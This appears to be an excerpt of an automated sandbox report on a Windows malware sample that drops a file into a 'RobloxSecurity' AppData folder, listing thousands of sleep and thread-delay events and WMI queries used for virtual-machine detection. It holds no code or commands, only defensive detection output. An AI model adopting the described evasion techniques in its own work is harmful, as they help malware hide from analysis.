Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Window / User API: threadDelayed 524	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6412	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2335	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 3339	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 6279	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 6523
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 2597

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597665s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452	Thread sleep count: 6523 > 30
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452	Thread sleep count: 2597 > 30
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599655s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599107s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598546s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598107s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597970s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597297s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597077s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596297s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -582622s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597665	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597970
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597077
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 582622
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.41.dr	Binary or memory string: VMware
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual USB Mouse
